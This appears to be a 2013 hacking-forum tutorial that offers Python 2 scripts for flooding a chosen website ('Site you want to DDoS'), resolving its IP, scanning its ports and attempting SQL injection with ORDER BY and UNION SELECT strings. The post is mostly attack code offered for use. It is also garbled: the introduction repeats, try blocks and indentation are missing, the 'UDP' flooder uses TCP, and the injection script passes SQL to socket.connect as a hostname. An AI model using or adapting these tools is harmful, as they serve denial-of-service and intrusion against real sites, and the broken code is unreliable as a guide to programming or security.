python for the lulz 02-10-2013, 02:37 AM
Hey all!
Welcome to my Python for the lulz tutorial!
In this tutorial I will be teaching you how to:
udp flood in python
resolve a website's IP in python
port scan in python
SQLI in python
So! lets begin![Biggrin Biggrin](
Python flooder:
resolve a website's IP in python
port scan in python
SQLI in python
enjoy these little tools and trinkets! keep an eye out for some of my other posts
Welcome to my Python for the lulz tutorial!
In this tutorial I will be teaching you how to:
udp flood in python
resolve a website's IP in python
port scan in python
SQLI in python
So! lets begin
![Biggrin Biggrin](
Python flooder:
import time
import socket
import os
import sys
import string
host=raw_input( "Site you want to DDoS:" )
port=input( "Port you want to attack:" )
message=raw_input( "Input the message you want to send:" )
conn=input( "How many connections you want to make:" )
ip = socket.gethostbyname( host )
print ("[" + ip + "]")
print ( "[Ip is locked]" )
print ( "[Attacking " + host + "]" )
print ("+----------------------------+")
def dos():
ddos = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ddos.connect((host, 80))
ddos.send( message )
ddos.sendto( message, (ip, port) )
ddos.send( message );
except socket.error, msg:
print("|[Connection Failed] |")
print ( "|[DDoS Attack Engaged] |")
for i in range(1, conn):
resolve a website's IP in python
import socket
host = raw_input( "Site you want to find Ip:" )
ip = socket.gethostbyname( host )
print ("The ip is :")
print ("[" + ip + "]")
if __name__ == "__main__":
answer = raw_input("Do you want to search for another site's IP?")
if answer.strip() in "y Y yes Yes YES".split():
port scan in python
import time
import socket
import os
import sys
import string
address = raw_input( "Choose your target:" )
start = input( "From port:" )
stop = input( "To port:" )
openportsL = []
def portscan(address, port):
ps = socket.socket()
print ("Searching for open ports")
ps.connect((address, port))
print ("[Port %s is OPEN.]") %(port)
openportsL[1:1] = [port]
return True
except socket.error, msg:
return False
print ("Port Scan Started ... It may take time")
for port in range(start, stop):
portscan(address, port)
print ("Port Scann completed")
print ("The open ports are :")
print ( openportsL )
SQLI in python
import socket
import sys
import os
import time
import urllib2
import base64
import re
from urllib2 import URLError, HTTPError
from optparse import OptionParser
#Target Website
website = raw_input( "Target Website:" )
#Connection to Website
hosc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Database Injection
#Column find
column = 1
order = hosc.connect((website + " order by" + column, 80))
while hosc != socket.error:
column = column + 1
column2 = column - 2
print("The number of columns is" + column2)
allcolumn= range(1,column2)
hosc.connect((website + " UNION SELECT " + allcolumn, 80))
enjoy these little tools and trinkets! keep an eye out for some of my other posts
![Biggrin Biggrin](